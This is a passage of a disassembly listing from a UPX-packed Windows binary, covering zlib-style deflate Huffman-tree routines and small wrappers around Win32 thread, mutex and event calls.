xor eax, eax
loc_418560: ; CODE XREF: sub_418550+2A�j
xor edx, edx
mov dx, word ptr dword_44A894[eax]
add dx, cx
add eax, 2
shl edx, 1
cmp eax, 1Ch
mov ecx, edx
mov [esp+eax+24h+var_24], cx
jle short loc_418560
push esi
xor esi, esi
test ebx, ebx
jl short loc_4185BC
push ebp
loc_418584: ; CODE XREF: sub_418550+69�j
movzx edx, word ptr [edi+esi*4+2]
test edx, edx
jz short loc_4185B6
xor eax, eax
mov ax, [esp+edx*2+2Ch+var_24]
movzx ecx, ax
inc eax
mov [esp+edx*2+2Ch+var_24], ax
xor eax, eax
nop
loc_4185A0: ; CODE XREF: sub_418550+5E�j
mov ebp, ecx
and ebp, 1
or eax, ebp
shr ecx, 1
shl eax, 1
dec edx
test edx, edx
jg short loc_4185A0
shr eax, 1
mov [edi+esi*4], ax
loc_4185B6: ; CODE XREF: sub_418550+3B�j
inc esi
cmp esi, ebx
jle short loc_418584
pop ebp
loc_4185BC: ; CODE XREF: sub_418550+31�j
mov ecx, [esp+28h+var_4]
pop esi
call sub_4192B6
add esp, 24h
retn
sub_418550 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4185D0 proc near ; CODE XREF: sub_4188D0+25�p
; sub_418D90+2B�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 4
push ecx
push ebx
push ebp
mov ebp, [esp+0Ch+arg_0]
mov ebx, [ebp+10h]
mov ecx, [ebp+4]
push esi
mov esi, [ebp+0]
push edi
or edx, 0FFFFFFFFh
xor edi, edi
xor eax, eax
test ebx, ebx
mov [esp+14h+var_4], edx
mov dword_441F88, edi
mov dword_430FF8, 23Dh
jle short loc_418636
loc_418601: ; CODE XREF: sub_4185D0+59�j
cmp word ptr [esi+eax*4], 0
jz short loc_41861F
inc edi
mov [esp+14h+var_4], eax
mov dword_441F90[edi*4], eax
mov byte_44B938[eax], 0
mov edx, eax
jmp short loc_418626
; ---------------------------------------------------------------------------
loc_41861F: ; CODE XREF: sub_4185D0+36�j
mov word ptr [esi+eax*4+2], 0
loc_418626: ; CODE XREF: sub_4185D0+4D�j
inc eax
cmp eax, ebx
jl short loc_418601
cmp edi, 2
mov dword_441F88, edi
jge short loc_41868E
loc_418636: ; CODE XREF: sub_4185D0+2F�j
mov ebp, dword_44BB7C
lea esp, [esp+0]
loc_418640: ; CODE XREF: sub_4185D0+AC�j
cmp edx, 2
jge short loc_41864E
inc edx
mov [esp+14h+var_4], edx
mov eax, edx
jmp short loc_418650
; ---------------------------------------------------------------------------
loc_41864E: ; CODE XREF: sub_4185D0+73�j
xor eax, eax
loc_418650: ; CODE XREF: sub_4185D0+7C�j
inc edi
mov dword_441F90[edi*4], eax
dec ebp
test ecx, ecx
mov word ptr [esi+eax*4], 1
mov byte_44B938[eax], 0
jz short loc_418679
movzx eax, word ptr [ecx+eax*4+2]
sub dword_430FFC, eax
mov edx, [esp+14h+var_4]
loc_418679: ; CODE XREF: sub_4185D0+98�j
cmp edi, 2
jl short loc_418640
mov dword_44BB7C, ebp
mov ebp, [esp+14h+arg_0]
mov dword_441F88, edi
loc_41868E: ; CODE XREF: sub_4185D0+64�j
mov [ebp+18h], edx
mov eax, edi
cdq
sub eax, edx
mov ebp, eax
sar ebp, 1
cmp ebp, 1
jl short loc_4186B0
nop
loc_4186A0: ; CODE XREF: sub_4185D0+DD�j
push ebp
call sub_417CF0
add esp, 4
dec ebp
cmp ebp, 1
jge short loc_4186A0
nop
loc_4186B0: ; CODE XREF: sub_4185D0+CD�j
; sub_4185D0+16F�j
mov ecx, dword_441F90[edi*4]
mov ebp, dword_441F94
dec edi
push 1
mov dword_441F94, ecx
mov dword_441F88, edi
call sub_417CF0
mov eax, dword_441F94
mov ecx, dword_430FF8
add esp, 4
dec ecx
mov dword_441F90[ecx*4], ebp
dec ecx
mov dword_441F90[ecx*4], eax
mov dx, [esi+eax*4]
add dx, [esi+ebp*4]
mov dword_430FF8, ecx
mov [esi+ebx*4], dx
mov cl, byte_44B938[eax]
mov dl, ss:byte_44B938[ebp]
cmp dl, cl
jb short loc_418716
movzx ecx, dl
jmp short loc_418719
; ---------------------------------------------------------------------------
loc_418716: ; CODE XREF: sub_4185D0+13F�j
movzx ecx, cl
loc_418719: ; CODE XREF: sub_4185D0+144�j
inc cl
mov byte_44B938[ebx], cl
mov [esi+eax*4+2], bx
mov [esi+ebp*4+2], bx
mov dword_441F94, ebx
push 1
inc ebx
call sub_417CF0
add esp, 4
cmp edi, 2
jge loc_4186B0
mov eax, dword_430FF8
mov ecx, dword_441F94
dec eax
mov dword_430FF8, eax
mov dword_441F90[eax*4], ecx
mov eax, [esp+14h+arg_0]
call sub_417DA0
mov ebx, [esp+14h+var_4]
mov edi, esi
call sub_418550
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
sub_4185D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_418780 proc near ; CODE XREF: sub_418940+66�p
; sub_418940+75�j
var_8 = dword ptr -8
var_4 = dword ptr -4
sub esp, 8
push ebx
movzx ebx, word ptr [edx+2]
push ebp
push esi
push edi
or ebp, 0FFFFFFFFh
xor esi, esi
test ebx, ebx
mov edi, eax
mov eax, 7
mov ecx, 4
jnz short loc_4187AA
mov eax, 8Ah
mov ecx, 3
loc_4187AA: ; CODE XREF: sub_418780+1E�j
test edi, edi
jl loc_4188BD
add edx, 6
inc edi
mov [esp+18h+var_8], edx
mov [esp+18h+var_4], edi
mov edi, edi
loc_4187C0: ; CODE XREF: sub_418780+137�j
inc esi
cmp esi, eax
mov edi, ebx
movzx ebx, word ptr [edx]
jge short loc_4187D2
cmp edi, ebx
jz loc_4188A3
loc_4187D2: ; CODE XREF: sub_418780+48�j
cmp esi, ecx
jge short loc_4187F7
loc_4187D6: ; CODE XREF: sub_418780+70�j
movzx eax, word_44BC8A[edi*4]
push eax
movzx eax, word_44BC88[edi*4]
call sub_4182D0
add esp, 4
dec esi
jnz short loc_4187D6
jmp loc_418875
; ---------------------------------------------------------------------------
loc_4187F7: ; CODE XREF: sub_418780+54�j
test edi, edi
jz short loc_418834
cmp edi, ebp
jz short loc_418819
movzx ecx, word_44BC8A[edi*4]
movzx eax, word_44BC88[edi*4]
push ecx
call sub_4182D0
add esp, 4
dec esi
loc_418819: ; CODE XREF: sub_418780+7D�j
movzx edx, word_44BCCA
movzx eax, word_44BCC8
push edx
call sub_4182D0
push 2
lea eax, [esi-3]
jmp short loc_41886D
; ---------------------------------------------------------------------------
loc_418834: ; CODE XREF: sub_418780+79�j
cmp esi, 0Ah
jg short loc_418854
movzx eax, word_44BCCE
push eax
movzx eax, word_44BCCC
call sub_4182D0
push 3
lea eax, [esi-3]
jmp short loc_41886D
; ---------------------------------------------------------------------------
loc_418854: ; CODE XREF: sub_418780+B7�j
movzx ecx, word_44BCD2
movzx eax, word_44BCD0
push ecx
call sub_4182D0
push 7
lea eax, [esi-0Bh]
loc_41886D: ; CODE XREF: sub_418780+B2�j
; sub_418780+D2�j
call sub_4182D0
add esp, 8
loc_418875: ; CODE XREF: sub_418780+72�j
xor esi, esi
test ebx, ebx
mov ebp, edi
jnz short loc_418889
mov eax, 8Ah
mov ecx, 3
jmp short loc_4188A3
; ---------------------------------------------------------------------------
loc_418889: ; CODE XREF: sub_418780+FB�j
cmp edi, ebx
jnz short loc_418899
mov eax, 6
mov ecx, 3
jmp short loc_4188A3
; ---------------------------------------------------------------------------
loc_418899: ; CODE XREF: sub_418780+10B�j
mov eax, 7
mov ecx, 4
loc_4188A3: ; CODE XREF: sub_418780+4C�j
; sub_418780+107�j ...
mov edx, [esp+18h+var_8]
mov edi, [esp+18h+var_4]
add edx, 4
dec edi
mov [esp+18h+var_8], edx
mov [esp+18h+var_4], edi
jnz loc_4187C0
loc_4188BD: ; CODE XREF: sub_418780+2C�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 8
retn
sub_418780 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4188D0 proc near ; CODE XREF: sub_418D90+3D�p
mov ecx, dword_42A20C
mov eax, offset word_441210
call sub_417F80
mov ecx, dword_42A228
mov eax, offset word_44BD28
call sub_417F80
push offset off_42A22C
call sub_4185D0
add esp, 4
mov eax, 12h
jmp short loc_418910
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h, 4 dup(0)
; ---------------------------------------------------------------------------
jmp short loc_418910
; ---------------------------------------------------------------------------
align 10h
loc_418910: ; CODE XREF: sub_4188D0+32�j
; sub_4188D0+3B�j ...
movzx ecx, byte_42A248[eax]
cmp word_44BC8A[ecx*4], 0
jnz short loc_418928
dec eax
cmp eax, 3
jge short loc_418910
loc_418928: ; CODE XREF: sub_4188D0+50�j
mov edx, dword_44BB7C
lea ecx, [eax+edx]
lea edx, [ecx+eax*2+11h]
mov dword_44BB7C, edx
retn
sub_4188D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_418940 proc near ; CODE XREF: sub_418D90+152�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push ebp
mov ebp, [esp+8+arg_0]
push esi
push 5
lea eax, [ebp-101h]
call sub_4182D0
mov ebx, [esp+10h+arg_4]
dec ebx
push 5
mov eax, ebx
call sub_4182D0
push 4
lea eax, [edi-4]
call sub_4182D0
add esp, 0Ch
xor esi, esi
test edi, edi
jle short loc_41899E
jmp short loc_418980
; ---------------------------------------------------------------------------
align 10h
loc_418980: ; CODE XREF: sub_418940+35�j
; sub_418940+5C�j
movzx eax, byte_42A248[esi]
movzx eax, word_44BC8A[eax*4]
push 3
call sub_4182D0
add esp, 4
inc esi
cmp esi, edi
jl short loc_418980
loc_41899E: ; CODE XREF: sub_418940+33�j
lea eax, [ebp-1]
mov edx, offset word_441210
call sub_418780
pop esi
pop ebp
mov eax, ebx
mov edx, offset word_44BD28
pop ebx
jmp sub_418780
sub_418940 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4189C0 proc near ; CODE XREF: sub_418D90+128�p
; sub_418D90+161�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 8
mov eax, dword_44BB84
push ebx
xor ebx, ebx
test eax, eax
push ebp
mov ebp, [esp+10h+arg_0]
mov byte ptr [esp+10h+arg_0], bl
jz loc_418ADC
push esi
mov [esp+14h+var_8], offset byte_44A930
mov [esp+14h+var_4], offset word_431210
push edi
mov edi, edi
loc_4189F0: ; CODE XREF: sub_4189C0+114�j
test bl, 7
jnz short loc_418A04
mov eax, [esp+18h+var_8]
mov cl, [eax]
inc eax
mov byte ptr [esp+18h+arg_0], cl
mov [esp+18h+var_8], eax
loc_418A04: ; CODE XREF: sub_4189C0+33�j
movzx edi, byte_442888[ebx]
mov al, byte ptr [esp+18h+arg_0]
inc ebx
test al, 1
jnz short loc_418A24
movzx edx, word ptr [ebp+edi*4+2]
movzx eax, word ptr [ebp+edi*4+0]
push edx
jmp loc_418ABB
; ---------------------------------------------------------------------------
loc_418A24: ; CODE XREF: sub_4189C0+52�j
movzx esi, byte ptr dword_44BB88[edi]
movzx eax, word ptr [ebp+esi*4+406h]
push eax
movzx eax, word ptr [ebp+esi*4+404h]
call sub_4182D0
mov eax, dword_42A0B8[esi*4]
add esp, 4
test eax, eax
jz short loc_418A63
mov ecx, dword_44A8B8[esi*4]
push eax
mov eax, edi
sub eax, ecx
call sub_4182D0
add esp, 4
loc_418A63: ; CODE XREF: sub_4189C0+8D�j
mov eax, [esp+18h+var_4]
movzx edi, word ptr [eax]
add eax, 2
cmp edi, 100h
mov [esp+18h+var_4], eax
jnb short loc_418A82
movzx esi, byte ptr dword_431008[edi]
jmp short loc_418A8E
; ---------------------------------------------------------------------------
loc_418A82: ; CODE XREF: sub_4189C0+B7�j
mov ecx, edi
shr ecx, 7
movzx esi, byte ptr dword_431108[ecx]
loc_418A8E: ; CODE XREF: sub_4189C0+C0�j
mov eax, [esp+18h+arg_4]
movzx edx, word ptr [eax+esi*4+2]
movzx eax, word ptr [eax+esi*4]
push edx
call sub_4182D0
mov eax, dword_42A130[esi*4]
add esp, 4
test eax, eax
jz short loc_418AC3
mov ecx, dword_44BE28[esi*4]
push eax
mov eax, edi
sub eax, ecx
loc_418ABB: ; CODE XREF: sub_4189C0+5F�j
call sub_4182D0
add esp, 4
loc_418AC3: ; CODE XREF: sub_4189C0+ED�j
mov cl, byte ptr [esp+18h+arg_0]
mov eax, dword_44BB84
shr cl, 1
cmp ebx, eax
mov byte ptr [esp+18h+arg_0], cl
jb loc_4189F0
pop edi
pop esi
loc_418ADC: ; CODE XREF: sub_4189C0+16�j
movzx eax, word ptr [ebp+402h]
push eax
movzx eax, word ptr [ebp+400h]
call sub_4182D0
add esp, 4
pop ebp
pop ebx
add esp, 8
retn
sub_4189C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_418B00 proc near ; CODE XREF: sub_416DF0+191�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov ecx, [esp+arg_4]
mov dword_44BB80, eax
xor eax, eax
cmp word_430F82, ax
mov dword_44BE20, ecx
mov dword_44BB78, eax
mov dword_44A890, eax
jnz locret_418D87
push ebx
push esi
mov [esp+8+arg_0], eax
xor edx, edx
push edi
jmp short loc_418B40
; ---------------------------------------------------------------------------
align 10h
loc_418B40: ; CODE XREF: sub_418B00+35�j
; sub_418B00+91�j
mov ecx, dword_42A0B8[edx*4]
mov esi, 1
shl esi, cl
mov dword_44A8B8[edx*4], eax
test esi, esi
jle short loc_418B8D
mov [esp+0Ch+arg_4], edx
mov dh, dl
lea edi, dword_44BB88[eax]
mov al, dl
mov ecx, esi
mov ebx, ecx
shr ecx, 2
mov eax, edx
shl eax, 10h
mov ax, dx
mov edx, [esp+0Ch+arg_4]
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
mov eax, [esp+0Ch+arg_0]
add eax, esi
mov [esp+0Ch+arg_0], eax
loc_418B8D: ; CODE XREF: sub_418B00+57�j
inc edx
cmp edx, 1Ch
jl short loc_418B40
push ebp
mov [eax+44BB87h], dl
xor ebp, ebp
xor edx, edx
mov edi, edi
loc_418BA0: ; CODE XREF: sub_418B00+E9�j
mov ecx, dword_42A130[edx*4]
mov eax, 1
shl eax, cl
mov dword_44BE28[edx*4], ebp
test eax, eax
mov [esp+10h+arg_0], eax
jle short loc_418BE5
mov ecx, eax
mov al, dl
mov bl, al
mov bh, bl
mov esi, ecx
shr ecx, 2
lea edi, dword_431008[ebp]
mov eax, ebx
shl eax, 10h
mov ax, bx
rep stosd
mov ecx, esi
and ecx, 3
rep stosb
mov eax, esi
add ebp, eax
loc_418BE5: ; CODE XREF: sub_418B00+BB�j
inc edx
cmp edx, 10h
jl short loc_418BA0
sar ebp, 7
cmp edx, 1Eh
mov [esp+10h+arg_0], ebp
jge short loc_418C5D
jmp short loc_418C00
; ---------------------------------------------------------------------------
align 10h
loc_418C00: ; CODE XREF: sub_418B00+F7�j
; sub_418B00+15B�j
mov ecx, dword_42A130[edx*4]
sub ecx, 7
mov esi, 1
shl esi, cl
mov eax, ebp
shl eax, 7
mov dword_44BE28[edx*4], eax
test esi, esi
jle short loc_418C57
mov [esp+10h+arg_4], edx
mov dh, dl
mov al, dl
lea ebp, dword_431108[ebp]
mov ecx, esi
mov ebx, ecx
shr ecx, 2
mov edi, ebp
mov ebp, [esp+10h+arg_0]
mov eax, edx
shl eax, 10h
mov ax, dx
mov edx, [esp+10h+arg_4]
rep stosd
mov ecx, ebx
and ecx, 3
add ebp, esi
rep stosb
mov [esp+10h+arg_0], ebp
loc_418C57: ; CODE XREF: sub_418B00+11F�j
inc edx
cmp edx, 1Eh
jl short loc_418C00
loc_418C5D: ; CODE XREF: sub_418B00+F5�j
xor ecx, ecx
mov dword_44A894, ecx
mov dword_44A898, ecx
mov dword_44A89C, ecx
mov dword_44A8A0, ecx
mov dword_44A8A4, ecx
mov dword_44A8A8, ecx
mov dword_44A8AC, ecx
mov dword_44A8B0, ecx
xor eax, eax
mov edi, 8
mov si, cx
pop ebp
lea ebx, [ebx+0]
loc_418CA0: ; CODE XREF: sub_418B00+1B0�j
mov word_441B0A[eax*4], di
inc eax
inc si
cmp eax, 8Fh
jle short loc_418CA0
cmp eax, 0FFh
mov word ptr dword_44A8A4, si
jg short loc_418CE9
mov ecx, dword_44A8A4
mov edx, 9
shr ecx, 10h
mov edi, edi
loc_418CD0: ; CODE XREF: sub_418B00+1E0�j
mov word_441B0A[eax*4], dx
inc eax
inc cx
cmp eax, 0FFh
jle short loc_418CD0
mov word ptr dword_44A8A4+2, cx
loc_418CE9: ; CODE XREF: sub_418B00+1BE�j
cmp eax, 117h
jg short loc_418D19
mov ecx, dword_44A8A0
shr ecx, 10h
mov edx, 7
mov edi, edi
loc_418D00: ; CODE XREF: sub_418B00+210�j
mov word_441B0A[eax*4], dx
inc eax
inc cx
cmp eax, 117h
jle short loc_418D00
mov word ptr dword_44A8A0+2, cx
loc_418D19: ; CODE XREF: sub_418B00+1EE�j
cmp eax, 11Fh
jg short loc_418D3D
lea eax, ds:441B0Ah[eax*4]
loc_418D27: ; CODE XREF: sub_418B00+234�j
mov [eax], di
add eax, 4
inc si
cmp eax, offset word_441F86
jle short loc_418D27
mov word ptr dword_44A8A4, si
loc_418D3D: ; CODE XREF: sub_418B00+21E�j
mov ebx, 11Fh
mov edi, offset byte_441B08
call sub_418550
xor edx, edx
mov edi, 5
loc_418D53: ; CODE XREF: sub_418B00+27D�j
mov word_430F82[edx*4], di
mov ecx, edx
xor eax, eax
mov esi, edi
loc_418D61: ; CODE XREF: sub_418B00+26D�j
mov ebx, ecx
and ebx, 1
or eax, ebx
shr ecx, 1
shl eax, 1
dec esi
jnz short loc_418D61
shr eax, 1
mov word_430F80[edx*4], ax
inc edx
cmp edx, 1Eh
jl short loc_418D53
pop edi
pop esi
pop ebx
jmp sub_417C70
; ---------------------------------------------------------------------------
locret_418D87: ; CODE XREF: sub_418B00+26�j
retn
sub_418B00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_418D90 proc near ; CODE XREF: sub_417860+1DC�p
; sub_417860+23F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, dword_431000
mov cl, byte_44A92C
mov edx, dword_44BB80
mov byte_44A930[eax], cl
cmp word ptr [edx], 0FFFFh
jnz short loc_418DB3
call sub_418220
loc_418DB3: ; CODE XREF: sub_418D90+1C�j
push ebx
push ebp
push esi
push offset off_42A1F4
call sub_4185D0
push offset off_42A210
call sub_4185D0
add esp, 8
call sub_4188D0
mov ecx, dword_430FFC
mov ebp, eax
mov eax, dword_44BB7C
add eax, 0Ah
add ecx, 0Ah
shr eax, 3
shr ecx, 3
cmp ecx, eax
ja short loc_418DF1
mov eax, ecx
loc_418DF1: ; CODE XREF: sub_418D90+5D�j
mov ebx, [esp+0Ch+arg_4]
cmp ebx, eax
mov esi, [esp+0Ch+arg_8]
ja short loc_418E49
test esi, esi
jz short loc_418E49
mov edx, dword_44BE20
test edx, edx
jz short loc_418E49
mov edx, dword_44A890
test edx, edx
jnz short loc_418E49
mov edx, dword_44BB78
test edx, edx
jnz short loc_418E49
mov eax, [esp+0Ch+arg_0]
push 0
call sub_418440
mov eax, dword_44BE20
mov edx, dword_44BB78
add esp, 4
mov dword_44A890, ebx
mov dword ptr [eax], 0
jmp loc_418F25
; ---------------------------------------------------------------------------
loc_418E49: ; CODE XREF: sub_418D90+6B�j
; sub_418D90+6F�j ...
lea edx, [ebx+4]
cmp edx, eax
push edi
ja short loc_418EA0
mov edi, [esp+10h+arg_0]
test edi, edi
jz short loc_418EA0
push 3
mov eax, esi
call sub_4182D0
mov eax, dword_44BB78
mov ecx, dword_44A890
add eax, 0Ah
shr eax, 3
add eax, ebx
lea edx, [ecx+eax+4]
push 1
mov eax, edi
mov dword_44A890, edx
mov dword_44BB78, 0
call sub_418440
mov edx, dword_44BB78
add esp, 8
jmp loc_418F24
; ---------------------------------------------------------------------------
loc_418EA0: ; CODE XREF: sub_418D90+BF�j
; sub_418D90+C7�j
cmp ecx, eax
push 3
jnz short loc_418EC7
lea eax, [esi+2]
call sub_4182D0
push offset word_430F80
push offset byte_441B08
call sub_4189C0
mov eax, dword_430FFC
add esp, 0Ch
jmp short loc_418EFE
; ---------------------------------------------------------------------------
loc_418EC7: ; CODE XREF: sub_418D90+114�j
lea eax, [esi+4]
call sub_4182D0
mov ecx, dword_42A228
mov edx, dword_42A20C
inc ecx
push ecx
inc edx
lea edi, [ebp+1]
push edx
call sub_418940
push offset word_44BD28
push offset word_441210
call sub_4189C0
mov eax, dword_44BB7C
add esp, 14h
loc_418EFE: ; CODE XREF: sub_418D90+135�j
mov ecx, dword_44BB78
lea edx, [ecx+eax+3]
mov ecx, dword_44A890
mov eax, edx
shr eax, 3
add ecx, eax
and edx, 7
mov dword_44A890, ecx
mov dword_44BB78, edx
loc_418F24: ; CODE XREF: sub_418D90+10B�j
pop edi
loc_418F25: ; CODE XREF: sub_418D90+B4�j
call sub_417C70
test esi, esi
pop esi
pop ebp
pop ebx
jz short loc_418F45
call sub_418370
mov edx, dword_44BB78
add edx, 7
mov dword_44BB78, edx
loc_418F45: ; CODE XREF: sub_418D90+19F�j
mov ecx, dword_44A890
mov eax, edx
shr eax, 3
add eax, ecx
retn
sub_418D90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_418F60 proc near ; CODE XREF: sub_401CF0+3�p
; sub_4024F0+3�p ...
push esi
mov esi, ecx
push 0
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_424EF4
call sub_419130
mov dword ptr [esi+8], 0
mov byte ptr [esi+14h], 0
mov byte ptr [esi+15h], 0
mov eax, esi
pop esi
retn
sub_418F60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_418F90 proc near ; CODE XREF: sub_401D10+18�j
; sub_402520+6�j ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push 0FFFFFFFFh
push offset SEH_418F90
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push esi
mov esi, ecx
mov [esp+14h+var_10], esi
mov dword ptr [esi], offset off_424EF4
mov al, [esi+15h]
test al, al
mov [esp+14h+var_4], 0
jz short loc_418FCC
mov eax, [esi+8]
push eax
call dword_42406C ; CloseHandle
loc_418FCC: ; CODE XREF: sub_418F90+30�j
add esi, 0Ch
mov ecx, esi
call sub_419180
mov ecx, esi
mov [esp+14h+var_4], 0FFFFFFFFh
call sub_4190E0
mov ecx, [esp+14h+var_C]
pop esi
mov large fs:0, ecx
add esp, 10h
retn
sub_418F90 endp
; ---------------------------------------------------------------------------
align 10h
loc_419000: ; DATA XREF: sub_419070+25�o
push esi
mov esi, [esp+8]
mov eax, [esi]
mov ecx, esi
call dword ptr [eax+4]
lea ecx, [esi+0Ch]
call sub_419180
xor eax, eax
pop esi
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_419020 proc near ; CODE XREF: sub_404730+68�p
; sub_409B00+34�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
mov esi, ecx
push eax
lea ecx, [esi+0Ch]
call sub_419160
test al, al
jnz short loc_419040
mov ecx, [esi+8]
push 0
push ecx
call dword_424068 ; TerminateThread
loc_419040: ; CODE XREF: sub_419020+12�j
pop esi
retn 4
sub_419020 endp
; ---------------------------------------------------------------------------
align 10h
loc_419050: ; DATA XREF: UPX0:off_424EF4�o
push esi
mov esi, ecx
call sub_418F90
test byte ptr [esp+8], 1
jz short loc_419068
push esi
call sub_41930D
add esp, 4
loc_419068: ; CODE XREF: UPX0:0041905D�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_419070 proc near ; CODE XREF: sub_404800+E2�p
; sub_404800+18C�p ...
arg_0 = byte ptr 4
push esi
mov esi, ecx
mov al, [esi+14h]
test al, al
jz short loc_419080
xor al, al
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_419080: ; CODE XREF: sub_419070+8�j
mov cl, [esp+4+arg_0]
xor eax, eax
test cl, cl
setnz al
lea ecx, [esi+4]
push ecx
dec eax
and eax, 4
push eax
push esi
push offset loc_419000
push 0
push 0
call dword_424140 ; CreateThread
cmp eax, 0FFFFFFFFh
mov [esi+8], eax
jz short loc_4190B0
mov byte ptr [esi+14h], 1
loc_4190B0: ; CODE XREF: sub_419070+3A�j
mov al, [esi+14h]
pop esi
retn 4
sub_419070 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4190C0 proc near ; CODE XREF: sub_408B20+4A�p
push esi
push 0
push 0
push 0
mov esi, ecx
call dword_42411C ; CreateMutexA
test eax, eax
mov [esi], eax
jnz short loc_4190DC
push eax
push eax
call sub_41A2B3
loc_4190DC: ; CODE XREF: sub_4190C0+13�j
mov eax, esi
pop esi
retn
sub_4190C0 endp
; =============== S U B R O U T I N E =======================================
sub_4190E0 proc near ; CODE XREF: sub_408ED0+41�p
; sub_408ED0+58�p ...
mov eax, [ecx]
push eax
call dword_42406C ; CloseHandle
retn
sub_4190E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4190F0 proc near ; CODE XREF: sub_408C40+76�p
; sub_408E20+1B�p
arg_0 = byte ptr 4
mov al, [esp+arg_0]
mov ecx, [ecx]
neg al
sbb eax, eax
push eax
push ecx
call dword_4240DC ; WaitForSingleObject
test eax, eax
jz short loc_419112
cmp eax, 80h
jz short loc_419112
xor eax, eax
retn 4
; ---------------------------------------------------------------------------
loc_419112: ; CODE XREF: sub_4190F0+14�j
; sub_4190F0+1B�j
mov eax, 1
retn 4
sub_4190F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_419120 proc near ; CODE XREF: sub_408C40+108�p
; sub_408DEE+10�p ...
mov eax, [ecx]
push eax
call dword_424148 ; ReleaseMutex
test eax, eax
setnz al
retn
sub_419120 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_419130 proc near ; CODE XREF: sub_408B20+75�p
; sub_408B20+A0�p ...
arg_0 = byte ptr 4
mov al, [esp+arg_0]
push esi
mov esi, ecx
push 0
mov [esi+4], al
movzx eax, al
push 0
push eax
push 0
call dword_4240E0 ; CreateEventA
test eax, eax
mov [esi], eax
jnz short loc_419157
push eax
push eax
call sub_41A2B3
loc_419157: ; CODE XREF: sub_419130+1E�j
mov eax, esi
pop esi
retn 4
sub_419130 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_419160 proc near ; CODE XREF: sub_408C40+6C�p
; sub_408E20+11�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
test eax, eax
jnz short loc_41916B
or eax, 0FFFFFFFFh
loc_41916B: ; CODE XREF: sub_419160+6�j
push eax
mov eax, [ecx]
push eax
call dword_4240DC ; WaitForSingleObject
neg eax
sbb eax, eax
inc eax
retn 4
sub_419160 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_419180 proc near ; CODE XREF: sub_408B20+B2�p
; sub_408C40+100�p ...
mov eax, [ecx]
push eax
call dword_4240D8 ; SetEvent
test eax, eax
setnz al
retn
sub_419180 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_419190 proc near ; CODE XREF: sub_408C40+DF�p
; sub_408E20+72�p
mov al, [ecx+4]
test al, al
jz short loc_4191A6
mov eax, [ecx]
push eax
call dword_42414C ; ResetEvent
test eax, eax
setnz al
retn
; ---------------------------------------------------------------------------
loc_4191A6: ; CODE XREF: sub_419190+5�j
xor al, al
retn
sub_419190 endp
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4191AA proc near ; CODE XREF: sub_405940+126�p
jmp dword_4240C0
sub_4191AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4191B0 proc near ; CODE XREF: sub_405940+7B�p
jmp dword_424178
sub_4191B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4191B6 proc near ; CODE XREF: sub_405940+57�p
jmp dword_4240C8
sub_4191B6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4191BC proc near ; CODE XREF: sub_4027A0+3A�p
; sub_4027A0+55�p ...
jmp $+5
sub_4191BC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4191C1 proc near ; CODE XREF: sub_4047B0+12�p
; sub_404800+97�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
jmp short loc_4191D8
; ---------------------------------------------------------------------------
loc_4191C8: ; CODE XREF: sub_4191C1+20�j
push esi
call sub_41AC3E
test eax, eax
pop ecx
jnz short loc_4191D8
call sub_419224
loc_4191D8: ; CODE XREF: sub_4191C1+5�j
; sub_4191C1+10�j
push esi
call sub_419DCB
test eax, eax
pop ecx
jz short loc_4191C8
pop esi
retn
sub_4191C1 endp
; =============== S U B R O U T I N E =======================================
sub_4191E5 proc near ; CODE XREF: UPX0:004191F3�p
; UPX0:004236EE�j
; DATA XREF: ...
mov dword ptr [ecx], offset off_424F00
jmp sub_41ACE0
sub_4191E5 endp
; ---------------------------------------------------------------------------
loc_4191F0: ; DATA XREF: UPX0:off_424F00�o
